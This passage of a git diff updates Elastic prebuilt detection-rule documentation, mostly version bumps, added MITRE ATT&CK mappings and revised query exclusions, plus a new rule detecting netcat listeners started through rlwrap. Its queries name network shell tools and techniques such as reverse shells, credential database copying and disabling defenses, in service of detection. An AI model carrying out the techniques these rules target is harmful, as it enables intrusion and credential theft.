or t * Tactic: Execution * Data Source: Elastic Defend -*Version*: 205 +*Version*: 206 *Rule authors*: 
@@ -71,3 +71,19 @@ host.os.type:windows and event.category:process and event.type:start and ( ** Name: Execution ** ID: TA0002 ** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ +* Sub-technique: +** Name: Visual Basic +** ID: T1059.005 +** Reference URL: https://attack.mitre.org/techniques/T1059/005/ diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-build-engine-using-an-alternate-name.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-build-engine-using-an-alternate-name.asciidoc index 544bcb3e84..3cf9f375b3 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-build-engine-using-an-alternate-name.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-build-engine-using-an-alternate-name.asciidoc @@ -35,7 +35,7 @@ An instance of MSBuild, the Microsoft Build Engine, was started after being rena * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 108 +*Version*: 109 *Rule authors*: @@ -125,3 +125,11 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Rename System Utilities ** ID: T1036.003 ** Reference URL: https://attack.mitre.org/techniques/T1036/003/ +* Technique: +** Name: Trusted Developer Utilities Proxy Execution +** ID: T1127 +** Reference URL: https://attack.mitre.org/techniques/T1127/ +* Sub-technique: +** Name: MSBuild +** ID: T1127.001 +** Reference URL: https://attack.mitre.org/techniques/T1127/001/ 
diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-exchange-server-um-spawning-suspicious-processes.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-exchange-server-um-spawning-suspicious-processes.asciidoc index 72f6932cec..e0eac8fbe2 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-exchange-server-um-spawning-suspicious-processes.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-exchange-server-um-spawning-suspicious-processes.asciidoc @@ -33,11 +33,12 @@ Identifies suspicious processes being spawned by the Microsoft Exchange Server U * OS: Windows * Use Case: Threat Detection * Tactic: Initial Access +* Tactic: Lateral Movement * Data Source: Elastic Endgame * Use Case: Vulnerability * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -81,3 +82,11 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Exploit Public-Facing Application ** ID: T1190 ** Reference URL: https://attack.mitre.org/techniques/T1190/ +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Exploitation of Remote Services +** ID: T1210 +** Reference URL: https://attack.mitre.org/techniques/T1210/ diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-exchange-server-um-writing-suspicious-files.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-exchange-server-um-writing-suspicious-files.asciidoc index bab58a1888..1ff960af2d 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-exchange-server-um-writing-suspicious-files.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-exchange-server-um-writing-suspicious-files.asciidoc 
@@ -33,11 +33,12 @@ Identifies suspicious files being written by the Microsoft Exchange Server Unifi * OS: Windows * Use Case: Threat Detection * Tactic: Initial Access +* Tactic: Lateral Movement * Data Source: Elastic Endgame * Use Case: Vulnerability * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -93,3 +94,11 @@ file where host.os.type == "windows" and event.type == "creation" and ** Name: Exploit Public-Facing Application ** ID: T1190 ** Reference URL: https://attack.mitre.org/techniques/T1190/ +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Exploitation of Remote Services +** ID: T1210 +** Reference URL: https://attack.mitre.org/techniques/T1210/ diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-exchange-worker-spawning-suspicious-processes.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-exchange-worker-spawning-suspicious-processes.asciidoc index 314da0871e..654b476000 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-exchange-worker-spawning-suspicious-processes.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-exchange-worker-spawning-suspicious-processes.asciidoc @@ -34,10 +34,11 @@ Identifies suspicious processes being spawned by the Microsoft Exchange Server w * OS: Windows * Use Case: Threat Detection * Tactic: Initial Access +* Tactic: Execution * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: 
@@ -76,3 +77,19 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Exploit Public-Facing Application ** ID: T1190 ** Reference URL: https://attack.mitre.org/techniques/T1190/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-windows-defender-tampering.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-windows-defender-tampering.asciidoc index a3d790f3a8..203622204a 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-windows-defender-tampering.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-windows-defender-tampering.asciidoc @@ -41,7 +41,7 @@ Identifies when one or more features on Microsoft Defender are disabled. Adversa * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -140,3 +140,7 @@ registry where host.os.type == "windows" and event.type in ("creation", "change" ** Name: Impair Defenses ** ID: T1562 ** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/rule-details/modification-of-amsienable-registry-key.asciidoc b/docs/detections/prebuilt-rules/rule-details/modification-of-amsienable-registry-key.asciidoc index 10dd0fc8e6..114d271554 100644 --- a/docs/detections/prebuilt-rules/rule-details/modification-of-amsienable-registry-key.asciidoc 
+++ b/docs/detections/prebuilt-rules/rule-details/modification-of-amsienable-registry-key.asciidoc @@ -37,7 +37,7 @@ Identifies modifications of the AmsiEnable registry key to 0, which disables the * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -131,3 +131,7 @@ registry where host.os.type == "windows" and event.type in ("creation", "change" ** Name: Disable or Modify Tools ** ID: T1562.001 ** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/rule-details/modification-of-dynamic-linker-preload-shared-object.asciidoc b/docs/detections/prebuilt-rules/rule-details/modification-of-dynamic-linker-preload-shared-object.asciidoc index 2997ba75d2..c2570c0803 100644 --- a/docs/detections/prebuilt-rules/rule-details/modification-of-dynamic-linker-preload-shared-object.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/modification-of-dynamic-linker-preload-shared-object.asciidoc @@ -3,7 +3,7 @@ Identifies modification of the dynamic linker preload shared object (ld.so.preload). Adversaries may execute malicious payloads by hijacking the dynamic linker used to load libraries. -*Rule type*: query +*Rule type*: new_terms *Rule indices*: @@ -34,7 +34,7 @@ Identifies modification of the dynamic linker preload shared object (ld.so.prelo * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 207 *Rule authors*: 
@@ -48,8 +48,8 @@ Identifies modification of the dynamic linker preload shared object (ld.so.prelo [source, js] ---------------------------------- -event.category:file and host.os.type:linux and not event.type:deletion and file.path:/etc/ld.so.preload and -event.action:(updated or renamed or rename) +host.os.type:linux and event.category:file and event.action:(updated or renamed or rename) and +not event.type:deletion and file.path:/etc/ld.so.preload ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/modification-of-openssh-binaries.asciidoc b/docs/detections/prebuilt-rules/rule-details/modification-of-openssh-binaries.asciidoc index a61b106d52..5ffcfe3044 100644 --- a/docs/detections/prebuilt-rules/rule-details/modification-of-openssh-binaries.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/modification-of-openssh-binaries.asciidoc @@ -36,7 +36,7 @@ Adversaries may modify SSH related binaries for persistence or credential access * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -56,7 +56,8 @@ event.category:file and host.os.type:linux and event.type:change and /usr/bin/sftp or /usr/bin/ssh or /usr/sbin/sshd) or - file.name:libkeyutils.so) + file.name:libkeyutils.so) and + not process.executable:/usr/share/elasticsearch/* ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/modification-of-standard-authentication-module-or-configuration.asciidoc b/docs/detections/prebuilt-rules/rule-details/modification-of-standard-authentication-module-or-configuration.asciidoc index baabbae692..4cab1d0430 100644 --- a/docs/detections/prebuilt-rules/rule-details/modification-of-standard-authentication-module-or-configuration.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/modification-of-standard-authentication-module-or-configuration.asciidoc 
@@ -3,7 +3,7 @@ Adversaries may modify the standard authentication module for persistence via patching the normal authorization process or modifying the login configuration to allow unauthorized access or elevate privileges. -*Rule type*: query +*Rule type*: new_terms *Rule indices*: @@ -37,7 +37,7 @@ Adversaries may modify the standard authentication module for persistence via pa * Tactic: Persistence * Data Source: Elastic Defend -*Version*: 104 +*Version*: 204 *Rule authors*: @@ -57,19 +57,11 @@ event.category:file and event.type:change and (* and not ( - /bin/yum or - "/usr/sbin/pam-auth-update" or /usr/libexec/packagekitd or - /usr/bin/dpkg or /usr/bin/vim or /usr/libexec/xpcproxy or /usr/bin/bsdtar or /usr/local/bin/brew or - /usr/bin/rsync or - /usr/bin/yum or - /var/lib/docker/*/bin/yum or - /var/lib/docker/*/bin/dpkg or - ./merged/var/lib/docker/*/bin/dpkg or "/System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/XPCServices/package_script_service.xpc/Contents/MacOS/package_script_service" ) ) and @@ -79,6 +71,12 @@ event.category:file and event.type:change and /tmp/newroot/lib/*/pam_*.so or /private/var/folders/*/T/com.apple.fileprovider.ArchiveService/TemporaryItems/*/lib/security/pam_*.so or /tmp/newroot/usr/lib64/security/pam_*.so + ) and + not process.name: + ( + yum or dnf or rsync or platform-python or authconfig or rpm or pdkg or apk or dnf-automatic or btrfs or + dpkg or pam-auth-update or steam or platform-python3.6 or pam-config or microdnf or yum_install or yum-cron or + systemd or containerd or pacman ) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/modification-of-the-mspkiaccountcredentials.asciidoc b/docs/detections/prebuilt-rules/rule-details/modification-of-the-mspkiaccountcredentials.asciidoc index 5180cb24a0..dbbf3da1b5 100644 --- a/docs/detections/prebuilt-rules/rule-details/modification-of-the-mspkiaccountcredentials.asciidoc 
+++ b/docs/detections/prebuilt-rules/rule-details/modification-of-the-mspkiaccountcredentials.asciidoc @@ -36,7 +36,7 @@ Identify the modification of the msPKIAccountCredentials attribute in an Active * Tactic: Privilege Escalation * Use Case: Active Directory Monitoring -*Version*: 6 +*Version*: 7 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/modification-or-removal-of-an-okta-application-sign-on-policy.asciidoc b/docs/detections/prebuilt-rules/rule-details/modification-or-removal-of-an-okta-application-sign-on-policy.asciidoc index 28ecb3ab7d..dede3f41ae 100644 --- a/docs/detections/prebuilt-rules/rule-details/modification-or-removal-of-an-okta-application-sign-on-policy.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/modification-or-removal-of-an-okta-application-sign-on-policy.asciidoc @@ -33,7 +33,7 @@ Detects attempts to modify or delete a sign on policy for an Okta application. A * Use Case: Identity and Access Audit * Data Source: Okta -*Version*: 105 +*Version*: 206 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/namespace-manipulation-using-unshare.asciidoc b/docs/detections/prebuilt-rules/rule-details/namespace-manipulation-using-unshare.asciidoc index f01051bc27..ad4395478c 100644 --- a/docs/detections/prebuilt-rules/rule-details/namespace-manipulation-using-unshare.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/namespace-manipulation-using-unshare.asciidoc @@ -35,7 +35,7 @@ Identifies suspicious usage of unshare to manipulate system namespaces. Unshare * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 6 +*Version*: 7 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/netcat-listener-established-via-rlwrap.asciidoc b/docs/detections/prebuilt-rules/rule-details/netcat-listener-established-via-rlwrap.asciidoc new file mode 100644 index 0000000000..60d1aec70a --- /dev/null 
+++ b/docs/detections/prebuilt-rules/rule-details/netcat-listener-established-via-rlwrap.asciidoc @@ -0,0 +1,66 @@ +[[netcat-listener-established-via-rlwrap]] +=== Netcat Listener Established via rlwrap + +Monitors for the execution of a netcat listener via rlwrap. rlwrap is a 'readline wrapper', a small utility that uses the GNU Readline library to allow the editing of keyboard input for any command. This utility can be used in conjunction with netcat to gain a more stable reverse shell. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and +process.name == "rlwrap" and process.args in ( + "nc", "ncat", "netcat", "nc.openbsd", "socat" +) and process.args : "*l*" and process.args_count >= 4 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ 
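Review bot: `process.args : "*l*"` in the query matches any argument containing the letter `l`, for example a hostname such as `localhost` or any file path, not only a listen flag, so the clause contributes little toward the "listener" in the rule title. If the intent is a flag, a dash-anchored pattern (something like `"-*l*"`) is closer to it; if the looseness is deliberate to cover `socat` address syntax, the page should say so. With `*References*: None` and no investigation guide, the `process.args_count >= 4` threshold is also left unexplained.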
diff --git a/docs/detections/prebuilt-rules/rule-details/network-activity-detected-via-cat.asciidoc b/docs/detections/prebuilt-rules/rule-details/network-activity-detected-via-cat.asciidoc index 735d09370c..4e0cbccd8f 100644 --- a/docs/detections/prebuilt-rules/rule-details/network-activity-detected-via-cat.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/network-activity-detected-via-cat.asciidoc @@ -29,7 +29,7 @@ This rule monitors for the execution of the cat command, followed by a connectio * Tactic: Command and Control * Data Source: Elastic Defend -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -44,10 +44,10 @@ This rule monitors for the execution of the cat command, followed by a connectio [source, js] ---------------------------------- sequence by host.id, process.entity_id with maxspan=1s - [process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and - process.name == "cat"] - [network where host.os.type == "linux" and event.action in ("connection_attempted", "disconnect_received") and - process.name == "cat"] + [process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and process.name == "cat" and + process.parent.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish")] + [network where host.os.type == "linux" and event.action in ("connection_attempted", "disconnect_received") and process.name == "cat" and + destination.ip != null and not cidrmatch(destination.ip, "127.0.0.0/8", "169.254.0.0/16", "224.0.0.0/4", "::1")] ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/network-connection-via-recently-compiled-executable.asciidoc b/docs/detections/prebuilt-rules/rule-details/network-connection-via-recently-compiled-executable.asciidoc index 279a16e421..2a4075e5df 100644 --- a/docs/detections/prebuilt-rules/rule-details/network-connection-via-recently-compiled-executable.asciidoc 
+++ b/docs/detections/prebuilt-rules/rule-details/network-connection-via-recently-compiled-executable.asciidoc @@ -29,7 +29,7 @@ This rule monitors a sequence involving a program compilation event followed by * Tactic: Execution * Data Source: Elastic Defend -*Version*: 1 +*Version*: 2 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/network-connection-via-registration-utility.asciidoc b/docs/detections/prebuilt-rules/rule-details/network-connection-via-registration-utility.asciidoc index da11bf5c78..aa8caba6a7 100644 --- a/docs/detections/prebuilt-rules/rule-details/network-connection-via-registration-utility.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/network-connection-via-registration-utility.asciidoc @@ -31,10 +31,11 @@ Identifies the native Windows tools regsvr32.exe, regsvr64.exe, RegSvcs.exe, or * OS: Windows * Use Case: Threat Detection * Tactic: Execution +* Tactic: Defense Evasion * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -140,6 +141,10 @@ sequence by process.entity_id ** ID: T1218 ** Reference URL: https://attack.mitre.org/techniques/T1218/ * Sub-technique: +** Name: Regsvcs/Regasm +** ID: T1218.009 +** Reference URL: https://attack.mitre.org/techniques/T1218/009/ +* Sub-technique: ** Name: Regsvr32 ** ID: T1218.010 ** Reference URL: https://attack.mitre.org/techniques/T1218/010/ diff --git a/docs/detections/prebuilt-rules/rule-details/network-connection-via-signed-binary.asciidoc b/docs/detections/prebuilt-rules/rule-details/network-connection-via-signed-binary.asciidoc index 12168d0cfc..a6c46ab537 100644 --- a/docs/detections/prebuilt-rules/rule-details/network-connection-via-signed-binary.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/network-connection-via-signed-binary.asciidoc 
@@ -34,7 +34,7 @@ Binaries signed with trusted digital certificates can execute on Windows systems * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -132,7 +132,3 @@ sequence by process.entity_id ** Name: System Binary Proxy Execution ** ID: T1218 ** Reference URL: https://attack.mitre.org/techniques/T1218/ -* Tactic: -** Name: Execution -** ID: TA0002 -** Reference URL: https://attack.mitre.org/tactics/TA0002/ diff --git a/docs/detections/prebuilt-rules/rule-details/network-level-authentication-nla-disabled.asciidoc b/docs/detections/prebuilt-rules/rule-details/network-level-authentication-nla-disabled.asciidoc index ce655b613c..49104d6902 100644 --- a/docs/detections/prebuilt-rules/rule-details/network-level-authentication-nla-disabled.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/network-level-authentication-nla-disabled.asciidoc @@ -34,7 +34,7 @@ Identifies the attempt to disable Network-Level Authentication (NLA) via registr * Data Source: Elastic Endgame * Rule Type: BBR -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -66,3 +66,7 @@ registry where host.os.type == "windows" and event.action != "deletion" and ** Name: Modify Registry ** ID: T1112 ** Reference URL: https://attack.mitre.org/techniques/T1112/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ diff --git a/docs/detections/prebuilt-rules/rule-details/new-activesyncalloweddeviceid-added-via-powershell.asciidoc b/docs/detections/prebuilt-rules/rule-details/new-activesyncalloweddeviceid-added-via-powershell.asciidoc index 9600f1a2da..0349cca49b 100644 --- a/docs/detections/prebuilt-rules/rule-details/new-activesyncalloweddeviceid-added-via-powershell.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/new-activesyncalloweddeviceid-added-via-powershell.asciidoc 
@@ -33,10 +33,11 @@ Identifies the use of the Exchange PowerShell cmdlet, Set-CASMailbox, to add a n * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Execution * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -77,3 +78,15 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Additional Email Delegate Permissions ** ID: T1098.002 ** Reference URL: https://attack.mitre.org/techniques/T1098/002/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/new-systemd-service-created-by-previously-unknown-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/new-systemd-service-created-by-previously-unknown-process.asciidoc index ca4d4dafa6..5e75dcc7bf 100644 --- a/docs/detections/prebuilt-rules/rule-details/new-systemd-service-created-by-previously-unknown-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/new-systemd-service-created-by-previously-unknown-process.asciidoc @@ -35,7 +35,7 @@ Systemd service files are configuration files in Linux systems used to define an * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 4 +*Version*: 5 *Rule authors*: 
@@ -49,11 +49,20 @@ Systemd service files are configuration files in Linux systems used to define an [source, js] ---------------------------------- -host.os.type : "linux" and event.action : ("creation" or "file_create_event") and -file.path : (/etc/systemd/system/* or /usr/local/lib/systemd/system/* or /lib/systemd/system/* or -/usr/lib/systemd/system/* or /home/*/.config/systemd/user/*) and not -(process.name : ("dpkg" or "dockerd" or "rpm" or "snapd" or "yum" or "exe" or "dnf" or "dnf-automatic" or python* or - "elastic-agent" or "cinc-client") or file.extension : ("swp" or "swx")) +host.os.type:linux and event.category:file and event.action:("creation" or "file_create_event") and file.path:( + /etc/systemd/system/* or + /usr/local/lib/systemd/system/* or + /lib/systemd/system/* or + /usr/lib/systemd/system/* or + /home/*/.config/systemd/user/* +) and +not ( + process.name:( + "dpkg" or "dockerd" or "rpm" or "snapd" or "yum" or "exe" or "dnf" or "dnf-automatic" or python* or "puppetd" or + "elastic-agent" or "cinc-client" or "chef-client" or "pacman" or "puppet" or "cloudflared" + ) or + file.extension:("swp" or "swpx") +) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/new-systemd-timer-created.asciidoc b/docs/detections/prebuilt-rules/rule-details/new-systemd-timer-created.asciidoc index cb64a87aa8..b38cecca42 100644 --- a/docs/detections/prebuilt-rules/rule-details/new-systemd-timer-created.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/new-systemd-timer-created.asciidoc @@ -35,7 +35,7 @@ Detects the creation of a systemd timer within any of the default systemd timer * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 5 +*Version*: 6 *Rule authors*: 
@@ -108,6 +108,7 @@ This rule monitors the creation of new systemd timer files, potentially indicati - Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. - Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + ---------------------------------- ==== Rule query @@ -117,7 +118,9 @@ This rule monitors the creation of new systemd timer files, potentially indicati ---------------------------------- host.os.type : "linux" and event.action : ("creation" or "file_create_event") and file.extension : "timer" and file.path : (/etc/systemd/system/* or /usr/local/lib/systemd/system/* or /lib/systemd/system/* or -/usr/lib/systemd/system/* or /home/*/.config/systemd/user/*) and not process.name : ("docker" or "dockerd" or "dnf" or "yum" or "rpm" or "dpkg" or "executor") +/usr/lib/systemd/system/* or /home/*/.config/systemd/user/*) and not process.name : ( + "docker" or "dockerd" or "dnf" or "yum" or "rpm" or "dpkg" or "executor" or "cloudflared" +) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/nping-process-activity.asciidoc b/docs/detections/prebuilt-rules/rule-details/nping-process-activity.asciidoc index 2ab39128ca..2778a5aff7 100644 --- a/docs/detections/prebuilt-rules/rule-details/nping-process-activity.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/nping-process-activity.asciidoc @@ -34,7 +34,7 @@ Nping ran on a Linux host. Nping is part of the Nmap tool suite and has the abil * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/ntds-or-sam-database-file-copied.asciidoc b/docs/detections/prebuilt-rules/rule-details/ntds-or-sam-database-file-copied.asciidoc index 2902e3a7e6..aad8dc2327 100644 
--- a/docs/detections/prebuilt-rules/rule-details/ntds-or-sam-database-file-copied.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/ntds-or-sam-database-file-copied.asciidoc @@ -37,7 +37,7 @@ Identifies a copy operation of the Active Directory Domain Database (ntds.dit) o * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -85,3 +85,7 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Security Account Manager ** ID: T1003.002 ** Reference URL: https://attack.mitre.org/techniques/T1003/002/ +* Sub-technique: +** Name: NTDS +** ID: T1003.003 +** Reference URL: https://attack.mitre.org/techniques/T1003/003/ diff --git a/docs/detections/prebuilt-rules/rule-details/nullsessionpipe-registry-modification.asciidoc b/docs/detections/prebuilt-rules/rule-details/nullsessionpipe-registry-modification.asciidoc index 56ac2b61f2..e6dc11ca07 100644 --- a/docs/detections/prebuilt-rules/rule-details/nullsessionpipe-registry-modification.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/nullsessionpipe-registry-modification.asciidoc @@ -31,10 +31,11 @@ Identifies NullSessionPipe registry modifications that specify which pipes can b * OS: Windows * Use Case: Threat Detection * Tactic: Lateral Movement +* Tactic: Defense Evasion * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -70,3 +71,11 @@ registry.path : ( ** Name: SMB/Windows Admin Shares ** ID: T1021.002 ** Reference URL: https://attack.mitre.org/techniques/T1021/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ 
diff --git a/docs/detections/prebuilt-rules/rule-details/office-test-registry-persistence.asciidoc b/docs/detections/prebuilt-rules/rule-details/office-test-registry-persistence.asciidoc index dac7481f4f..7988f872f7 100644 --- a/docs/detections/prebuilt-rules/rule-details/office-test-registry-persistence.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/office-test-registry-persistence.asciidoc @@ -29,10 +29,11 @@ Identifies the modification of the Microsoft Office "Office Test" Registry key, * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Defense Evasion * Data Source: Elastic Defend * Rule Type: BBR -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -65,3 +66,11 @@ registry where host.os.type == "windows" and event.action != "deletion" and ** Name: Office Test ** ID: T1137.002 ** Reference URL: https://attack.mitre.org/techniques/T1137/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/rule-details/okta-brute-force-or-password-spraying-attack.asciidoc b/docs/detections/prebuilt-rules/rule-details/okta-brute-force-or-password-spraying-attack.asciidoc index 3eda1d5551..c7e7c4750a 100644 --- a/docs/detections/prebuilt-rules/rule-details/okta-brute-force-or-password-spraying-attack.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/okta-brute-force-or-password-spraying-attack.asciidoc @@ -32,7 +32,7 @@ Identifies a high number of failed Okta user authentication attempts from a sing * Tactic: Credential Access * Data Source: Okta -*Version*: 106 +*Version*: 207 *Rule authors*: 
diff --git a/docs/detections/prebuilt-rules/rule-details/okta-threatinsight-threat-suspected-promotion.asciidoc b/docs/detections/prebuilt-rules/rule-details/okta-threatinsight-threat-suspected-promotion.asciidoc index 91168f666c..9d6c4a4cc9 100644 --- a/docs/detections/prebuilt-rules/rule-details/okta-threatinsight-threat-suspected-promotion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/okta-threatinsight-threat-suspected-promotion.asciidoc @@ -32,7 +32,7 @@ Okta ThreatInsight is a feature that provides valuable debug data regarding auth * Use Case: Identity and Access Audit * Data Source: Okta -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/okta-user-session-impersonation.asciidoc b/docs/detections/prebuilt-rules/rule-details/okta-user-session-impersonation.asciidoc index c51463f4e2..160bb0288e 100644 --- a/docs/detections/prebuilt-rules/rule-details/okta-user-session-impersonation.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/okta-user-session-impersonation.asciidoc @@ -31,7 +31,7 @@ A user has initiated a session impersonation granting them access to the environ * Tactic: Credential Access * Data Source: Okta -*Version*: 106 +*Version*: 207 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/outbound-scheduled-task-activity-via-powershell.asciidoc b/docs/detections/prebuilt-rules/rule-details/outbound-scheduled-task-activity-via-powershell.asciidoc index 3ef825d22d..fd97683b7c 100644 --- 